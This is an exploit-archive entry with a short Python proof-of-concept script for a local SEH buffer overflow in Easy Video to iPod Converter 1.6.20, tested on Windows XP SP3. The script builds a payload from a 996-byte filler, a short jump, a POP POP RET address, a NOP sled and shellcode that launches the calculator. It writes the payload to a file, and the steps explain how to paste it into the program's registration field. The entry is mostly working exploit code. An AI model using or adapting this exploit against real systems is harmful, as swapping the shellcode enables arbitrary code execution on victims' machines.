Easy Video To iPod Converter 1.6.20 Buffer Overflow

Easy Video to iPod Converter version 1.6.20 SEH buffer overflow exploit.


MD5 | aa17408887e690a988af3285c1275ed3

# Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
# Date: 2019-01-26
# Exploit Author: Nawaf Alkeraithe
# Twitter: @Alkeraithe1
# Vulnerable Software: Easy Video to iPod Converter 1.6.20
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.6.20
# Software Link: http://www.divxtodvd.net/easy_video_to_ipod.exe
# Tested Windows XP SP3 x86

# PoC Steps
#1- run the program
#2- click on "Register"
#3- In the "Enter User Name" field, past the content of the payload, and click "OK"


junk = "A"*996
jmp = "\xEB\x06\x90\x90"
popPopRetAddr = "\x11\x7B\x03\x10"
NOPs = "\x90"*20;
shellCode = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

payload = junk + jmp + popPopRetAddr + NOPs + shellCode

exploitText = open("exploit.txt","w")
exploitText.write(payload)
exploitText.close()

Related Posts